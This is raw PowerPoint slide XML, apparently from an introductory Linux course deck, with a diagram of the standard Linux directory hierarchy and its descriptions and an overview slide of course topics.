        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4089985" y="1502114"/>
            <a:ext cx="6609830" cy="4935839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208164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Linux File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973281" y="3271260"/>
            <a:ext cx="1387781" cy="1315754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Root Directory</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Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4089985" y="1502115"/>
            <a:ext cx="1501647" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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/bin/</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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/boot/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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/dev/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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etc</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27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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/home/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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/lib/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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/media</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30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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mnt</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31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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/opt/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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sbin</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33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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srv</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34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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tmp</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35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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usr</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36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763265"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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var</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37" name="Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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/root/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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proc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1656360"/>
            <a:ext cx="1728928" cy="2272777"/>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42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="1964851"/>
            <a:ext cx="1728926" cy="1964286"/>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45" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2273340"/>
            <a:ext cx="1728926" cy="1655797"/>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52" name="Straight Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2581830"/>
            <a:ext cx="1728925" cy="1347307"/>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54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="2890319"/>
            <a:ext cx="1728926" cy="1038818"/>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56" name="Straight Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3198810"/>
            <a:ext cx="1728925" cy="730327"/>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58" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728925" cy="2354571"/>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60" name="Straight Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="2046081"/>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62" name="Straight Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1737592"/>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64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="1429101"/>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66" name="Straight Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728929" cy="195142"/>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68" name="Straight Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3815790"/>
            <a:ext cx="1728923" cy="113347"/>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70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2361062" y="3507300"/>
            <a:ext cx="1728925" cy="421837"/>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72" name="Straight Connector 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="812122"/>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74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728926" cy="1120612"/>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76" name="Straight Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2361062" y="3929137"/>
            <a:ext cx="1728928" cy="503632"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5591626" y="1502115"/>
            <a:ext cx="5108211" cy="4935838"/>
            <a:chOff x="3598673" y="1515762"/>
            <a:chExt cx="964945" cy="6458465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 92"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="1515762"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C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Essential user command </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>inaries</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Rectangle 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="1919417"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099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Static files of Boot Loader</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95" name="Rectangle 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="2323071"/>
              <a:ext cx="964941" cy="403654"/>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Device files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96" name="Rectangle 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="2726725"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00776D"/>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Host-specific system configuration</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97" name="Rectangle 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="3130378"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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User home directories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98" name="Rectangle 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3534033"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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Shared libraries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99" name="Rectangle 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="3937687"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FA0E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Mount point for removable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> media</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0" name="Rectangle 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598673" y="4341341"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00206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Mount point for file systems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1" name="Rectangle 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598677" y="4744994"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00DED9"/>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Add-on application software packages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2" name="Rectangle 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5148649"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>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System binaries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3" name="Rectangle 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="5552303"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC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Data for services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4" name="Rectangle 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="5955957"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="6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Temp files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5" name="Rectangle 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598676" y="6359610"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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User utilities and applications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6" name="Rectangle 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="6763266"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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Variable files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7" name="Rectangle 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598675" y="7166919"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Home directory for root user</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8" name="Rectangle 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3598674" y="7570573"/>
              <a:ext cx="964941" cy="403654"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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Virtual </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>filesystem</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> for Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4089985" y="1502114"/>
            <a:ext cx="6609830" cy="4935839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4152270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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8670532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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564262" y="4642704"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
